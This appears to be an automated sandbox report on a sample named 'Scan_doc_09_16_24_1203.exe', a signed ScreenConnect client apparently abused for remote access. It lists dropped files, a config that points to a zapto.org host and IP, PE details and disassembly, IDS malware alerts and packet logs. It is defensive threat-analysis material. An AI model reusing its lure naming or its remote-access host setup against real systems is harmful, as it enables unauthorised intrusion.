                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>
                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):87
                                                                                                                                                                                                                Entropy (8bit):3.463057265798253
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:/lqlhGXKRjgjkFmURueGvx2VTUz:4DRPAx2Kz
                                                                                                                                                                                                                MD5:D2DED43CE07BFCE4D1C101DFCAA178C8
                                                                                                                                                                                                                SHA1:CE928A1293EA2ACA1AC01B61A344857786AFE509
                                                                                                                                                                                                                SHA-256:8EEE9284E733B9D4F2E5C43F71B81E27966F5CD8900183EB3BB77A1F1160D050
                                                                                                                                                                                                                SHA-512:A05486D523556C75FAAEEFE09BB2F8159A111B1B3560142E19048E6E3898A506EE4EA27DD6A4412EE56A7CE7C21E8152B1CDD92804BAF9FAC43973FABE006A2F
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:......../...............................Microsoft Enhanced Cryptographic Provider v1.0.
                                                                                                                                                                                                                Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):55
                                                                                                                                                                                                                Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1590
                                                                                                                                                                                                                Entropy (8bit):5.363907225770245
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:48:MxHKQ71qHGIs0HKEHiYHKGSI6oPtHTHhAHKKkhHNpv:iq+wmj0qECYqGSI6oPtzHeqKkhtpv
                                                                                                                                                                                                                MD5:E88F0E3AD82AC5F6557398EBC137B0DE
                                                                                                                                                                                                                SHA1:20D4BBBE8E219D2D2A0E01DA1F7AD769C3AC84DA
                                                                                                                                                                                                                SHA-256:278AA1D32C89FC4CD991CA18B6E70D3904C57E50192FA6D882959EB16F14E380
                                                                                                                                                                                                                SHA-512:CA6A7AAE873BB300AC17ADE2394232E8C782621E30CA23EBCE8FE65EF2E5905005EFD2840FD9310FBB20D9E9848961FAE2873B3879FCBC58F8A6074337D5802D
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..2,"System.Deployment, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture
                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe
                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):563
                                                                                                                                                                                                                Entropy (8bit):5.039448776106875
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:12:TMHdGGqq9yAas26K9YG6DLI4MWiNuGEAaORnYPENOpvH/vXbAa3xT:2dL9hK6E46YP7vH
                                                                                                                                                                                                                MD5:94F2B125FF2AD83490DCE247338E06CB
                                                                                                                                                                                                                SHA1:30578C28C03869B8325298B547508DDAEC36E5BE
                                                                                                                                                                                                                SHA-256:57736985015312753A6998421628C976A736B9CECBAB5EFF4BD1877055A2C03D
                                                                                                                                                                                                                SHA-512:E6672F868F80EF633B40B591DA32376C52383947C7E1A39A352BD4A737641BC02E66BCF34CB8A06486EFAD202A35BA32348E0D4AC1F482253F8389C4F676F759
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="HostToAddressMap" serializeAs="String">.. <value>ttyuio.zapto.org=178.215.236.119-02%2f10%2f2024%2004%3a16%3a42</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>
                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                Size (bytes):1835008
                                                                                                                                                                                                                Entropy (8bit):4.465559208019763
                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                SSDEEP:6144:GIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uNQdwBCswSbX:rXD94+WlLZMM6YFH2+X
                                                                                                                                                                                                                MD5:5AB920664351BF0C989D77FD3028B402
                                                                                                                                                                                                                SHA1:70DF1B853BD0733572208477ED9235BCD8203B7B
                                                                                                                                                                                                                SHA-256:B89A196E6C2C2E0C0E1D7484A3F57E6957A3FE199346A235C88382773C466C09
                                                                                                                                                                                                                SHA-512:5D18193EB6DD8DCF9F8E6B8F9F9F67F50E3402DA4D114282B2504386732625607D9685F1E577FCFF85B7F6052FAB4DE148F659F34F3AF00D1C2B4688CF7A1C72
                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.D5..................................................................................................................................................................................................................................................................................................................................................".........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                Entropy (8bit):6.51449814982565
                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                File name:Scan_doc_09_16_24_1203.exe
                                                                                                                                                                                                                File size:83'368 bytes
                                                                                                                                                                                                                MD5:0753315cbf45a34d4402e7b04a17fddf
                                                                                                                                                                                                                SHA1:5fe769171802694bb13fd3388065c111c8740beb
                                                                                                                                                                                                                SHA256:96cda11b1a4aabf9b2f7695a8b9a87aaa6ff6ae9f2748d89fe7bba2a393703f7
                                                                                                                                                                                                                SHA512:53f33d6aeb2de5d13257e0b858aa455dfb8c48f1598412b50a4e02155629998169d00f8ce62946e826a129f849148ba0ccb0e635012a0fbc0f4e7a4b0387f97c
                                                                                                                                                                                                                SSDEEP:1536:xoG6KpY6Qi3yj2wyq4HwiMO10HVLCJRpsWr6cdaxPBJYYD7UxD2c:renkyfPAwiMq0RqRfbaxZJYYD7c
                                                                                                                                                                                                                TLSH:90835B43B5E18875E9720E3118B1D9B4593FBD110EA48EAF3398426E0F351D19E3AE7B
                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ycId...d...d.......n...............|.......A.......v.......v...m`..a...d...........e.......e.......e...Richd...........PE..L..
                                                                                                                                                                                                                Icon Hash:90cececece8e8eb0
                                                                                                                                                                                                                Entrypoint:0x401489
                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                Digitally signed:true
                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                Time Stamp:0x66BBDDB2 [Tue Aug 13 22:26:58 2024 UTC]
                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                                OS Version Minor:1
                                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                                File Version Minor:1
                                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                                Subsystem Version Minor:1
                                                                                                                                                                                                                Import Hash:37d5c89163970dd3cc69230538a1b72b
                                                                                                                                                                                                                Signature Valid:true
                                                                                                                                                                                                                Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                Signature Validation Error:The operation completed successfully
                                                                                                                                                                                                                Error Number:0
                                                                                                                                                                                                                Not Before, Not After
                                                                                                                                                                                                                • 17/08/2022 01:00:00 16/08/2025 00:59:59
                                                                                                                                                                                                                Subject Chain
                                                                                                                                                                                                                • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                                                                                                                                                Version:3
                                                                                                                                                                                                                Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                                                                                                                                                Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                                                                                                                                                Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                                                                                                                                                Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                call 00007F1710C4107Ah
                                                                                                                                                                                                                jmp 00007F1710C40B2Fh
                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                push 00000000h
                                                                                                                                                                                                                call dword ptr [0040B048h]
                                                                                                                                                                                                                push dword ptr [ebp+08h]
                                                                                                                                                                                                                call dword ptr [0040B044h]
                                                                                                                                                                                                                push C0000409h
                                                                                                                                                                                                                call dword ptr [0040B04Ch]
                                                                                                                                                                                                                push eax
                                                                                                                                                                                                                call dword ptr [0040B050h]
                                                                                                                                                                                                                pop ebp
                                                                                                                                                                                                                ret
                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                sub esp, 00000324h
                                                                                                                                                                                                                push 00000017h
                                                                                                                                                                                                                call dword ptr [0040B054h]
                                                                                                                                                                                                                test eax, eax
                                                                                                                                                                                                                je 00007F1710C40CB7h
                                                                                                                                                                                                                push 00000002h
                                                                                                                                                                                                                pop ecx
                                                                                                                                                                                                                int 29h
                                                                                                                                                                                                                mov dword ptr [004118C0h], eax
                                                                                                                                                                                                                mov dword ptr [004118BCh], ecx
                                                                                                                                                                                                                mov dword ptr [004118B8h], edx
                                                                                                                                                                                                                mov dword ptr [004118B4h], ebx
                                                                                                                                                                                                                mov dword ptr [004118B0h], esi
                                                                                                                                                                                                                mov dword ptr [004118ACh], edi
                                                                                                                                                                                                                mov word ptr [004118D8h], ss
                                                                                                                                                                                                                mov word ptr [004118CCh], cs
                                                                                                                                                                                                                mov word ptr [004118A8h], ds
                                                                                                                                                                                                                mov word ptr [004118A4h], es
                                                                                                                                                                                                                mov word ptr [004118A0h], fs
                                                                                                                                                                                                                mov word ptr [0041189Ch], gs
                                                                                                                                                                                                                pushfd
                                                                                                                                                                                                                pop dword ptr [004118D0h]
                                                                                                                                                                                                                mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                mov dword ptr [004118C4h], eax
                                                                                                                                                                                                                mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                mov dword ptr [004118C8h], eax
                                                                                                                                                                                                                lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                mov dword ptr [004118D4h], eax
                                                                                                                                                                                                                mov eax, dword ptr [ebp-00000324h]
                                                                                                                                                                                                                mov dword ptr [00411810h], 00010001h
                                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x1060c0x3c.rdata
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x130000x1e0.rsrc
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x118000x2da8
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x140000xddc.reloc
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0xfe380x70.rdata
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xfd780x40.rdata
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0xb0000x13c.rdata
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                .text0x10000x9cf80x9e00bae4521030709e187bdbe8a34d7bf731False0.6035650712025317data6.581464957368758IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                .rdata0xb0000x5d580x5e00ec94ce6ebdbe57640638e0aa31d08896False0.4178025265957447Applesoft BASIC program data, first line number 14.843224204192078IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                .data0x110000x11cc0x80004a548a5c04675d08166d3823a6bf61bFalse0.16357421875data2.0120795802951505IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                .rsrc0x130000x1e00x200aa256780346be2e1ee49ac6d69d2faffFalse0.52734375data4.703723272345726IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                .reloc0x140000xddc0xe00908329e10a1923a3c4938a10d44237d9False0.7776227678571429data6.495696626464028IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                RT_MANIFEST0x130600x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                                KERNEL32.dllLocalFree, GetProcAddress, LoadLibraryA, Sleep, LocalAlloc, GetModuleFileNameW, DecodePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, GetModuleFileNameA, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap, HeapSize, HeapReAlloc, FlushFileBuffers, GetConsoleCP, GetConsoleMode, SetFilePointerEx, WriteConsoleW, CreateFileW
                                                                                                                                                                                                                CRYPT32.dllCertDeleteCertificateFromStore, CryptMsgGetParam, CertCloseStore, CryptQueryObject, CertAddCertificateContextToStore, CertFindAttribute, CertFreeCertificateContext, CertCreateCertificateContext, CertOpenSystemStoreA
                                                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                                EnglishUnited States
                                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                2024-10-02T06:16:27.400359+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1178.215.236.119443192.168.2.449747TCP
                                                                                                                                                                                                                2024-10-02T06:16:28.527421+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1178.215.236.119443192.168.2.449749TCP
                                                                                                                                                                                                                2024-10-02T06:16:32.632868+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1178.215.236.119443192.168.2.449753TCP
                                                                                                                                                                                                                2024-10-02T06:16:33.732202+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1178.215.236.119443192.168.2.449754TCP
                                                                                                                                                                                                                2024-10-02T06:16:35.195398+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1178.215.236.119443192.168.2.449755TCP
                                                                                                                                                                                                                2024-10-02T06:16:36.308287+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1178.215.236.119443192.168.2.449758TCP
                                                                                                                                                                                                                2024-10-02T06:16:38.610321+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1178.215.236.119443192.168.2.449761TCP
                                                                                                                                                                                                                2024-10-02T06:16:40.355840+02002009897ET MALWARE Possible Windows executable sent when remote host claims to send html content1178.215.236.119443192.168.2.449762TCP
                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                Oct 2, 2024 06:16:19.525217056 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:19.525263071 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:19.525357008 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:19.554415941 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:19.554430008 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:20.193322897 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:20.193459034 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:20.248465061 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:20.248492002 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:20.248897076 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:20.308080912 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:20.685803890 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:20.727406025 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:20.948609114 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:20.948671103 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:20.948693037 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:20.948713064 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:20.948725939 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:20.948757887 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:20.948774099 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:20.948777914 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:20.948798895 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:20.948828936 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:20.948843956 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:20.948854923 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:20.991317034 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.038022995 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.038034916 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.038090944 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.038120031 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.038213968 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.038213968 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.038232088 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.040098906 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.040402889 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.040421009 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.044085026 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.044101000 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.048085928 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.127713919 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.127736092 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.127871990 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.127901077 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.127996922 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.129090071 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.129106998 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.129347086 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.129355907 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.129535913 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.130791903 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.130812883 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.131021023 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.131030083 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.131134987 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.217781067 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.217803001 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.218628883 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.218666077 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.218687057 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.218688011 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.218715906 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.219496965 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.219511032 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.219548941 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.219548941 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.219564915 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.220093966 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.220458984 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.220478058 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.220540047 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.220540047 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.220549107 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.221466064 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.221478939 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.224090099 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.224112988 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.276092052 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.307480097 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.307502985 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.307589054 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.307620049 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.307981014 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.308000088 CEST44349731178.215.236.119192.168.2.4
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.308032990 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.308032990 CEST49731443192.168.2.4178.215.236.119
                                                                                                                                                                                                                Oct 2, 2024 06:16:21.308039904 CEST44349731178.215.236.119192.168.2.4
